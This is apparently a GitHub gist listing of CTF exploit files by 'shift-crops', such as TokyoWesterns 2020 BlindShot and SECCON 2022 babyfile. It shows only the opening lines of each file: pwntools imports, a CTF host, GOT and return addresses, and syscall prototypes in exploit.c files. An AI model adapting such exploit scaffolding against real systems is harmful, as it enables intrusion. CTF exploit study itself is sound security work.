Shimizu Yutaro shift-crops
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from sc_pwn import * | |
| rhp = ("crackme.sakura.tductf.org",10773) | |
| #rhp = ("192.168.75.129",8080) | |
| addr_ret = 0x08048afc | |
| addr_got_exit = 0x0804912c | |
| addr_got_sleep = 0x0804911c | |
| addr_tmp = 0x080491a0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| from pwnlib.elf.elf import dotdict | |
| p = lambda x: pack(x) | |
| u = lambda x: unpack(x, len(x)*8) | |
| class Environment: | |
| def __init__(self, *envs): | |
| self.__env = None |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // gcc exploit.c -masm=intel -fno-PIE -nostdlib -no-pie -o exploit | |
| #include <stdio.h> | |
| #include <sys/mman.h> | |
| #include <fcntl.h> | |
| size_t read(int fd, void *buf, size_t count); | |
| size_t write(int fd, void *buf, size_t count); | |
| int open(const char* pathname, int flags, ...); | |
| int close(int fd); | |
| void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // gcc exploit.c -masm=intel -fno-PIE -nostdlib -no-pie -o exploit | |
| #include <stdio.h> | |
| #include <fcntl.h> | |
| #include <sys/mman.h> | |
| size_t read(int fd, void *buf, size_t count); | |
| size_t write(int fd, void *buf, size_t count); | |
| int open(const char* pathname, int flags, ...); | |
| int close(int fd); | |
| void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // gcc exploit.c -masm=intel -fno-PIE -nostdlib -no-pie -o exploit | |
| #include <stdio.h> | |
| #include <fcntl.h> | |
| #include <sys/mman.h> | |
| size_t read(int fd, void *buf, size_t count); | |
| size_t write(int fd, void *buf, size_t count); | |
| int open(const char* pathname, int flags, ...); | |
| int close(int fd); | |
| void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // gcc exploit.c -masm=intel -fno-PIE -static -no-pie -o exploit | |
| #include <stdio.h> | |
| #include <string.h> | |
| #include <fcntl.h> | |
| #include <sys/mman.h> | |
| size_t read(int fd, void *buf, size_t count); | |
| size_t write(int fd, void *buf, size_t count); | |
| int open(const char* pathname, int flags, ...); | |
| int close(int fd); |
shift-crops
/ exploit_blindshot.py
Created
September 21, 2020 15:28
TokyoWesterns CTF 2020 BlindShot
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from sc_expwn import * # https://raw.githubusercontent.com/shift-crops/sc_expwn/master/sc_expwn.py | |
| bin_file = './blindshot' | |
| context(os = 'linux', arch = 'amd64') | |
| # context.log_level = 'debug' | |
| #========== | |
| env = Environment('debug', 'local', 'remote') |
shift-crops
/ exploit_babyfile.py
Created
November 13, 2022 05:22
SECCON CTF 2022 babyfile/simplemod
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from sc_expwn import * # https://raw.githubusercontent.com/shift-crops/sc_expwn/master/sc_expwn.py | |
| bin_file = './chall' | |
| context(os = 'linux', arch = 'amd64') | |
| # context.log_level = 'debug' | |
| #========== | |
| env = Environment('debug', 'local', 'remote') |